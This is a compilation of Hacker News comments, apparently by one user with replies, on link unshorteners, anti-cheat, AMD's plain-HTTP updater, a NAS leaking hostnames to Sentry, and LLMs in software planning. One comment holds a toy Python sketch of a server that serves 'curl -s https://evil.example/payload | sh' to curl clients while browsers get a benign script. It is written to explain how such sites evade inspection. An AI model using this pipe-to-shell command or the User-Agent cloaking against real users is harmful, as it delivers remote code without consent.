I wonder if someone more creative than me could push this to do things it was not designed to do. I recently found a video where someone exploited properties of certain transcript file formats to build a primitive drawing app out of YouTube's video player's closed captions.[0]
Since a brush's code can see the state of the canvas and draw on it, perhaps there can be a brush that does the opposite here, and instead renders a simple "video" when you hold down the mouse? Or even a simple game, like Tic-Tac-Toe.
I understand that obviously isn't the purpose of the brush programs, but I think it is an interesting challenge, just for fun.
[0] The video I am thinking of is by a channel named Firama, but they did not explain how they accomplished it. Another channel, SWEet, made their own attempt, which wasn't as full-featured as the original, but they did document how they did it.
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g. reputable dev, made by Apple, etc.)? Looking it up, it seems to be an $8 link-unshortener app.
In any case, there have been malicious sites that return different results based on request headers (e.g. the User-Agent: if the request comes from a web browser, return a benign script; if it comes from curl, return the malicious one). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
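For illustration, a toy sketch of that server-side trick — the names and payloads here are entirely hypothetical, and this only models the discrimination logic, not any real site's behavior:

```python
# Hypothetical sketch: how a malicious server might pick its response
# based on the User-Agent header. Payloads and domains are made up.

def serve(headers: dict) -> str:
    """Return a different payload depending on who appears to be asking."""
    ua = headers.get("User-Agent", "").lower()
    if ua.startswith(("curl/", "wget/")):
        # Looks like a pipe-to-shell fetch: serve the malicious script.
        return "curl -s https://evil.example/payload | sh"
    # Browsers (and anyone manually inspecting the page) get the benign one.
    return "echo 'hello world'"

print(serve({"User-Agent": "curl/8.5.0"}))                       # malicious branch
print(serve({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}))  # benign branch
```

Which is why what you see when inspecting the final URL in a browser can differ from what curl would actually receive.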
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that started getting popular on Windows last year, where a "captcha" asks you to hit Super + R and paste a command to "verify" yourself? But I suppose this type of attack has been going on for a long, long time. I remember Facebook and some other websites used to have a big warning in the developer console asking users not to paste scripts they found online there, as they are likely scams and will not do what they claim to do.
---
Side-note: Is the layout of the website confusing for anyone else? Without borders on the images (and with the images the same width as the paragraph text), they seemed like part of the page, and I found myself trying to select text on an image and briefly wondering why I could not. Turning on my Dark Reader extension helped a little, since the screenshots were on a white background, but it still felt a bit jarring.
Agreed, the lack of borders or indentation on the screenshots is very confusing. It's hard to understand what text comes from the malicious website and what is from the author.
> they should provide built-in anti-cheat support in the OS.
As much as I dislike anti-cheat in general (why incorporate it instead of just having proper moderation and/or private servers? Do you need a sketchy third-party kernel-level driver policing you to make sure you're "browsing the internet properly in a way that is compliant with company XYZ's policies", or running a photo editor, word processor, or any other software "correctly"? It's _your_ software that you bought.), something similar is already happening with, e.g., Widevine bundled in browsers for DRM-ed video streaming.
I agree that having some first-party or reputable anti-cheat driver or system is probably preferable to having different studios roll out their own anti-cheat drivers. (I am aware there are already studio-level or common third-party anti-cheat solutions, such as Denuvo or Vanguard, but I would prefer something better.)
> why incorporate it instead of just having proper moderation and/or private servers?
No one wants to become a moderator; they do it out of necessity. So it's pretty much the other way around: a lot of anticheats were, and are, originally developed by community members for private servers (because you're not deploying a third-party anti-cheat onto first-party servers). BattlEye was originally for Battlefield games, PunkBuster for Team Fortress, EasyAntiCheat for Counter-Strike. I even remember the StarCraft: Brood War third-party server ICCup requiring a custom 'anti-hack' client.
You still see this today with Counter-Strike 2 private servers like FACEIT: they have additional anti-cheat, not less. Same with GTA V modded private servers: FiveM has an anti-cheat they call "adhesive".
And then game developers saw that players were doing this, so they integrated the anti-cheat themselves, so players wouldn't have to download and install it separately. Quake 3 Arena added PunkBuster in an update, for example.
>why incorporate it instead of just having proper moderation and/or private servers?
Because game studios these days are all about global matchmaking. Private servers aren't really a thing any more except in more niche games. Instead you (optionally with a party) queue for matchmaking. Every game has to have a ranked ladder these days, it seems.
I miss the days of Tribes 2 or CS1.6 when games had server browsers
> Because game studios these days are all about global matchmaking
Why not have moderation then? When participating in an online forum, you are essentially "matchmaking" into a topic or corner of the internet with similar interests. Have some moderators (be they members of the community or staff) ban players for obvious hacking/cheating or rule-breaking behaviour, and allow members to report instances of it (I believe this is already a thing in modern video games; I have seen videos of "influencers" getting enraged when losing and reporting players for "stream sniping").
Sure, this might cause the usual issues of creating an echo chamber where mods and admins might unfairly ban members of the community. But you could always just join a different server in that case.
I believe Minecraft has a system similar to what I described: you enter the URL of a server to join, each server hosted on its own independent instance (not necessarily hosted by Mojang, the studio behind Minecraft), each with its own unique set of rules and culture, and being banned on one server does not ban you from every other server. Incidentally, Minecraft also does not have kernel-level anticheat, and still very successfully manages to be one of the most popular games around (by some accounts, the top-selling game of all time).
> I miss the days of Tribes 2 or CS1.6 when games had server browsers
>I believe Minecraft has a system similar to what I described
Except every big server has to run an anticheat. Some servers required clients with client side anticheats even. Some servers required you to screen share with a moderator and they would go through the files on your computer to look for cheats. Exploiting people for free labor to moderate servers was never enough to stop the problems cheating caused. Even with these volunteers, anticheat was essential: seeing which players were flagging checks told moderators who to watch.
> Except every big server has to run an anticheat. Some servers required clients with client side anticheats even.
I am fine with anticheat on the server side to help volunteers/moderators find issues, since it does not force the user to install any sketchy kernel-level software. As for the servers that require client-side anticheats, I was unaware there are Minecraft servers that do this (though I do not doubt you when you say they exist), and can't speak to it.
> Some servers required you to screen share with a moderator and they would go through the files on your computer to look for cheats.
I was not aware this is a practice some servers have. It is beyond ridiculous to ask someone to screen share just to verify no cheats were involved, imo, and a major invasion of privacy. The only scenario where I can see this being okay is at a physically hosted event where players are playing on devices provided by the event organisers, so there would be no expectation of privacy anyway, in the same way you do not have an expectation of privacy on a work device.
In both cases, you could always find a different server that does not run anticheat, or even start your own server (if you were willing to do that). This isn't something that can even be done in other modern games that employ anticheat drivers and only allow connecting to their single official server.
Re: exploiting people for free labor to moderate servers
Nobody is forcing them to do it; I imagine they do it because they enjoy it and want to give back to the community, the same way someone would contribute to open source or moderate a forum in their spare time. In any case, is it always "free labor"? I have heard of paid transactions and/or donations, sponsors, or servers being hosted by streamers who have other sources of income to pay moderators. Though admittedly, I am not familiar with Minecraft in particular or whether this is actually the case on most servers.
>the same way someone would contribute to open source or moderate a forum in their spare time
It would be like an open-source business where the owner makes millions of dollars a month off the software and then tries to get people to work for him for free to make him even more money. The volunteers do all the work and the owner makes all the money.
> I agree that having some first-party or reputable anti-cheat driver or system is probably preferable to having different studios roll out their own anti-cheat drivers. (I am aware there are already studio-level or common third-party anti-cheat solutions, such as Denuvo or Vanguard, but I would prefer something better.)
Only Apple really has enough platform lockdown to achieve that. Whatever Microsoft ships would have more holes than swiss cheese (not that I'm opposed to that or anything).
Would that not create the issue that you would only need to find one bypass for said official anti-cheat that then works for all games out there?
I've heard that with Denuvo, reverse-engineering work needs to be done for each individual target to unprotect it, but I'm not sure whether that would be the case with a first-party anti-cheat driver.
While I don't like that the executable's update URL is using just plain HTTP, AMD does explicitly state in their program that attacks requiring man-in-the-middle or physical access are out-of-scope.
Whether you agree with whether this rule should be out-of-scope or not is a separate issue.
What I'm more curious about is the presence of both a Development and a Production URL for their XML files, and their use of the Development URL in production. As the author said, that URL does use TLS/SSL so it's "safe", but I would be curious to know if the executable URLs are the same in both XML files, and if not, I would perform binary diffing between those two executables.
I imagine there might be some interesting differential there that might lead to a bug bounty. For example, maybe some developer debug tooling that is present only in the development version and is not safe to use in production could lead to exploitation, since they seem to use the Development URL in production for some reason...
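A crude first pass at that diffing could just be hashing the two binaries and counting differing byte offsets. This is only a sketch (the file paths are hypothetical); a real bug hunt would diff the disassembly with purpose-built tooling rather than raw bytes:

```python
import hashlib


def quick_binary_diff(path_a: str, path_b: str) -> tuple[bool, int]:
    """Return (identical?, number of differing byte positions).

    A byte-level count is only a rough signal of how different two
    builds are; it says nothing about *what* changed.
    """
    with open(path_a, "rb") as f:
        a = f.read()
    with open(path_b, "rb") as f:
        b = f.read()
    identical = hashlib.sha256(a).digest() == hashlib.sha256(b).digest()
    # Differing positions in the common prefix, plus any length overhang.
    diffs = sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))
    return identical, diffs
```

e.g. `quick_binary_diff("dev_installer.exe", "prod_installer.exe")` (hypothetical filenames); a non-zero count would be the cue to open both in a disassembler.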
For paying out, maybe, but this is 100% a high priority security issue regardless of AMD's definition of in scope, and yet because they won't pay out for it they also seem to have decided not to fix it.
I already said I do not like that it is just using HTTP, and yes, it is problematic.
What I am saying is that the issue the author reported and the issue that AMD considers man-in-the-middle attacks as out-of-scope, are two separate issues.
If someone reports that a homeowner keeps their keys visibly on top of the mat in front of their front door, and the homeowner replies that they do not consider intruders entering their home a problem, these are two separate issues, with the latter having wider ramifications (since it determines whether other methods and vectors of MITM attack, besides the one the author of the post reported, are declared out-of-scope as well). But that doesn't mean the former issue is unimportant; it just means it was already acknowledged, and the latter issue is what should be focused on (at least on AMD's side; it still presents a problem for users who disagree with AMD that it is out-of-scope).
The phrasing of your first two sentences in your first post makes it sound like you're dismissing the security issue. If you meant that it's a real security issue with a separate policy issue on top of it, you should word it very differently.
> The phrasing of your first two sentences in your first post makes it sound like you're dismissing the security issue.
Genuine question: how does it sound like I'm dismissing it? My first sentence begins with the phrase
> I don't like that the executable's update URL is using just plain HTTP
And my second sentence
> Whether you agree with whether this rule should be out-of-scope or not is a separate issue.
which, with the context that AMD declared MITM out-of-scope, clearly indicates that I think of it as an issue, albeit a separate one from the one the author already reported.
> The bots will quite possibly have no extensions at all
I imagine most users will also have no extensions at all, so this would not be a reliable metric for tracking bots. Maybe that is hard to imagine for someone whose first move after installing a web browser is to install the extensions they absolutely can't live without (uBlock Origin, Privacy Badger, Dark Reader, NoScript, Vimium C, whatever), but I imagine the majority of casual users do not install any extensions or even know they exist (maybe besides some people using something like Grammarly or Honey, since those aggressively advertise on YouTube).
I do agree with the rest of your reasons though, like if bots used a specific exact combination of extensions, or if there was an extension specifically for LinkedIn scraping/automation they want to detect, and of course, user tracking.
> the characters ’n’ and ‘o’ differ by only one bit; an unpredictable error that sets that bit could change GenuineIntel to GenuineIotel.
On a QWERTY keyboard, the O key is also next to the I key. It's also possible someone accidentally fat-fingered "GenuineIontel", noticed something was off, moved their cursor between the "o" and "n", and accidentally hit Delete instead of Backspace.
Maybe an unlikely set of circumstances, but I imagine a random bit flip at the hardware level is rare, since it would likely cause other problems if something more important were bit-flipped.
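For what it's worth, the article's one-bit claim is easy to verify for ASCII:

```python
# 'n' is 0x6E and 'o' is 0x6F: their ASCII codes differ only in the
# lowest bit, so a single flipped bit turns "GenuineIntel" into
# "GenuineIotel".
assert ord("n") ^ ord("o") == 0b1

s = "GenuineIntel"
i = s.index("Intel") + 1            # position of the 'n' in "Intel"
flipped = s[:i] + chr(ord(s[i]) ^ 1) + s[i + 1:]
print(flipped)  # GenuineIotel
```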
I like this theory - I can totally imagine some big spreadsheet of processor model names where someone copy/pastes the model name to some janky firmware-programming utility running on an off-the-shelf mini PC on the manufacturing floor, implemented as a "temporary fix" 5 years ago, every time the production line changes CPU model.
Is "clown GCP Host" a technical term I am unaware of, or is the author just voicing their discontent?
Seems to me that the problem is the NAS's web interface using Sentry for logging/monitoring, and part of what gets logged is internal hostnames (which might be named in a way that carries sensitive info, e.g. the corp-and-other-corp-merger example they gave; so it wouldn't matter that the host is inaccessible on a private network, the name itself is sensitive information).
In that case, I would personally replace the operating system of the NAS with a free/open-source one that I trust and that does not phone home. I suppose some form of ad-blocking à la Pi-hole, or some other DNS configuration that blocks the Sentry calls, would work too, but I would just go with an operating system I trust.
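For the DNS route, the rule is a one-liner in dnsmasq/Pi-hole-style config. This is only a sketch: `sentry.io` is the domain from the article, and you'd adjust it to whatever the device actually calls out to.

```conf
# dnsmasq / Pi-hole: answer sentry.io and all of its subdomains with
# 0.0.0.0 so the web UI's phone-home requests go nowhere
address=/sentry.io/0.0.0.0
```

Note this only helps for clients that actually use your resolver; a device with hardcoded DNS would sail right past it.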
No, it's because lots of stuff is duct-taped together, and then you have tons of scripts or tooling that was someone's weekend project (to make their oncall burden easier) that they shared around. Usually there'll be a flag like --clowntown or --clowny-xyz when it's obvious to all parties involved that it's destined to destroy everything one day, but YOLO (also a common one).
Could you please stop posting unsubstantive comments and flamebait? You've unfortunately been doing it repeatedly. It's not what this site is for, and destroys what it is for.
You may not owe clown-resemblers better, but you owe this community better if you're participating in it.
We ban accounts that keep posting in this sort of pattern, as yours has, so if you'd please review https://news.ycombinator.com/newsguidelines.html and stick to the rules when posting here, we'd appreciate it.
As long as you and I both agree on the truth, I am willing to go along with your moderation. I can cut down on some of the editorial remarks, but everyone on this site engages in some level of unsubstantiated commentary and I really would appreciate knowing what % of posts can be unsubstantiated opinion before it becomes a significant pattern.
I remember the term "clown computing" to describe "cloud computing" from IRC earlier than 2016
I use a localhost TLS forward proxy for all TCP and HTTP over the LAN
There is no access to remote DNS, only local DNS. I use stored DNS data periodically gathered in bulk from various sources. As such, HTTP and other traffic over TCP that use hostnames cannot reach hosts on the internet unless I allow it in local DNS or the proxy config
For me, "WebPKI" has proven useful for blocking attempts to phone home. Attempts to phone home that try to use TLS will fail
I also like adding CSP response header that effectively blocks certain Javascript
It sounds like the blog author gave the NAS direct access to the internet
Every user is different, not everyone has the same preferences
Another habit I follow is to set the gateway of (a) computers I cannot trust, i.e., ones running corporate OS I cannot control, to (b) a computer that I believe I can control running UNIX-like OS that I compiled from source
I run tcpdump on (b)
(b) is the only computer with direct access to the internet
The only time I have seen a sentry.io DNS request is from (a)
> It sounds like the blog author gave the NAS direct access to the internet
FTFA:
Every time you load up the NAS [in your browser], you get some clown GCP host knocking on your door, presenting a SNI hostname of that thing you buried deep inside your infrastructure. Hope you didn't name it anything sensitive, like "mycorp-and-othercorp-planned-merger-storage", or something.
Around this time, you realize that the web interface for this thing has some stuff that phones home, and part of what it does is to send stack traces back to sentry.io. Yep, your browser is calling back to them, and it's telling them the hostname you use for your internal storage box. Then for some reason, they're making a TLS connection back to it, but they don't ever request anything. Curious, right?
This is when you fire up Little Snitch, block the whole domain for any app on the machine, and go on with life.
I disagree with your conclusion. The post speaks specifically about interactions with the NAS through a browser being the source of the problem and the use of an OSX application firewall program called Little Snitch to resolve the problem. [0] The author's ~fifteen years of posts demonstrate that she is a significantly accomplished and knowledgeable system administrator who has configured and debugged much trickier things than what's described in the article.
It's not impossible that the source of the problem has been misidentified... but it's extremely unlikely. Having said that, one thing I do find likely is that the NAS in question is isolated from the Internet; that's just a smart thing that a savvy sysadmin would do.
[0] I find it... unlikely that the NAS in question is running OSX, so Little Snitch is almost certainly running on a client PC, rather than the NAS.
> Is "clown GCP Host" a technical term I am unaware of, or is the author just voicing their discontent?
The term has been in use for quite some time; it is voicing sarcastic discontent with the hyperscaler platforms _and_ their users (the idea being that the platform is "someone else's computer" or, more up to date, "a landlord for your data"). I'm not sure if she coined it, but if she did, then good on her!
Not everyone believes using "the cloud" is a good idea, and for those of us who have run their own infrastructure "on-premises" or co-located, the clown is considered suitably patronising. Just saying ;)
> the idea being that the platform is "someone else's computer"
I have a vague memory of once having a userscript or browser extension that replaced every instance of the word "cloud" with "other people's computers" (iirc, while funny, it was not practical, and I removed it).
fwiw I agree and I do not believe using "the cloud" for everything is a good idea either, I've just never heard of the word "clown" being used in this way before now.
I remember ridiculing "cloud computing" by calling it "clown computing" decades ago. It's pretty old and well established snark-jargon, like spelling Micro$oft with a dollar sign.
What are your thoughts on the usefulness of tribal knowledge when older (age-wise) employees change jobs? [0]
Then, the tribal knowledge they had at their previous place of employment won't be as useful somewhere else. Though I suppose you can make an argument that they might have similar workflows, or tools, or they might just have general experience that would be useful.
But I suppose your comment was more on the under-appreciation by management of existing tribal knowledge in a team.
[0] Perhaps out of necessity, e.g: company went under, or maybe they want a change of pace.
> most tech debt isn’t actually created in the code, it’s created in product meetings. Deadlines. Scope cuts.
> When asked what would help most, two themes dominated
> Reducing ambiguity upstream so engineers aren’t blocked...
I do wonder how much LLMs would help here; this seems, to me at least, to be a uniquely human problem. Humans (managers, leads, owners, what have you) are the ones who interpret requirements, decide deadlines, features, and scope cuts, and are the ones liable for them.
What could an LLM do to reduce ambiguity upstream? If it was trained on information about the requirements, that same information could be documented somewhere for engineers to refer to. And if it were to hallucinate or "guess" an answer without asking a person for clarification, and the guess turned out to be wrong, who would be responsible? Imo, the bureaucracy of waiting for clarification mid-implementation is a necessary evil. Clever engineers, through experience, might implement things in an open way that can easily accommodate future changes they predict might happen.
As for the second point,
> A clearer picture of affected services and edge cases
> three categories stood out: state machine gaps (unhandled states caused by user interaction sequences), data flow gaps, and downstream service impacts.
I'd agree. Perhaps when a system is complex enough, and a developer is laser focused on a single component of it, it is easy to miss gaps when other parts of the system are used in conjunction with it. I remember a while ago, it used to be a popular take that LLMs were a useful tool for generating unit tests, because of their usual repetitive nature and because LLMs were usually good at finding edge cases to test, some of which a developer might have missed.
---
I will say, it is refreshing to see a take on coding assistants being used in other parts of the lifecycle instead of just writing code, which, as the article pointed out, came with its own set of problems (increased inefficiencies in other parts of the development lifecycle, potential AI-introduced security vulnerabilities, etc.)
> the faded colors, limited palette along with the dithering really grew on me
I wonder if the resemblance to a faded photo (like a faded Polaroid) might have helped with this, especially if one already has memories and some similar photos.
I have not used an e-ink tablet in a long time (since the Kobo Glo), but since I've stopped reading fiction, I do not really see the allure of these devices for myself. They're far too expensive to use as an alternative to a notebook, the screens are usually too small to read technical non-fiction textbooks (think PDFs instead of EPUBs), and if I wanted to look at media with colors, I do not think most current color e-ink displays are good enough for a pleasing experience. But, like the author said, it is nice to have a digital photo frame that does not need to be recharged often and can easily swap out the photos.